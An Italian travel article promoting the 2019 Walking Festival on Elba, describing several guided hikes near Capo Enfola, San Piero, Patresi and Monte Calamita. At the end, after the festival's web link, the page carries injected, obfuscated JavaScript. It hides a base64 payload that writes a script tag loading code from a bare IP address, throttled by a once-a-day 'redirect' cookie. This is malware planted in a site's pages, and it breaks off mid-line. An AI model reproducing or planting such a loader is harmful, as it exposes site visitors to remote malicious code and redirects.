Scoprire l'Elba a passo di trekking

Parte dall’Elba il Walking Festival 2019

Fino al 26 maggio l’Arcipelago Toscano ospiterà suggestive escursioni trekking ed eventi dedicati alle principali giornate internazionali in tema ambientale e culturale

Con la “Camminata nella Valle dei Mulini”, l’Elba ha dato il via all’edizione 2019 del Walking Festival, la manifestazione dedicata al trekking che ogni anno anima il Parco nazionale dell’Arcipelago Toscano.

Il Walking Festival 2019 si svolgerà fino al 26 maggio proponendo suggestive escursioni di trekking e passeggiate a tema, con degustazioni d’autore ed eventi culturali, in tutte le isole dell’Arcipelago Toscano.

Alcuni degli appuntamenti

Chi desidera festeggiare la primavera trascorrendo qualche giorno di vacanza immerso nell’incantevole natura dell’Isola può scegliere tra le numerose iniziative legate alla manifestazione, che vuole sensibilizzare il grande pubblico su temi ambientali e culturali. Ecco una selezione delle passeggiate:

“Una terra nel mare” è una passeggiata di 2 ore intorno a Capo Enfola, caratteristico promontorio legato a testimonianze storiche della Seconda Guerra Mondiale e alla pesca del tonno. Lungo il percorso, affacciandosi dalle scogliere a picco sul mare si ammireranno scorci caratteristici della costa settentrionale dell’Isola e i nidi degli uccelli marini che l’Elba accoglie. La visita alla tonnara sarà guidata dai racconti e testimonianze di un vecchio pescatore.

“Le vie di granito” parte dalla località San Piero in Campo e conduce in un viaggio nella storia, tra le testimonianze dei culti religiosi di età villanoviana, i resti maestosi delle antiche cave romane e le tradizioni agricole e pastorali delle comunità del versante occidentale. Il percorso è di media difficoltà e dura 4 ore.

“Gli anelli del parco verde” è un percorso di media difficoltà di 5 ore. Si parte dal borgo contadino di Patresi: tra essenze mediterranee e boschi di castagno si giunge al Santuario della Madonna del Monte, continuando lungo il Caprile di Serraventosa. Il tratto del “raggio verde” conclude il cammino.

Il “Trekking alla vecchia ferrovia” è un’escursione pomeridiana alla scoperta delle Miniere del monte Calamita e il Cantiere del Vallone. Dalla Spiaggia dell’Innamorata ci si muove alla scoperta dei tesori nascosti dell’archeologia mineraria dell’Isola d’Elba, imbattendosi di continuo in tradizioni e leggende.

Dal 14 settembre l’edizione autunnale

Lanciato per la prima volta nel 1999, il Walking Festival si svolge sia in primavera che in autunno. Quest’anno gli appuntamenti autunnali si terranno dal 14 settembre al 3 novembre.

La maggior parte delle escursioni e attività proposte durante il Walking Festival è gratuita con prenotazione obbligatoria. Sono disponibili pacchetti turistici che abbinano soggiorni brevi a selezionate iniziative.

Per maggiori informazioni e dettagli su passeggiate ed eventi visita la pagina: www.tuscanywalkingfestival.it _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Vedi tutti gli eventi

Share this post

Nessun commento

Aggiungi commento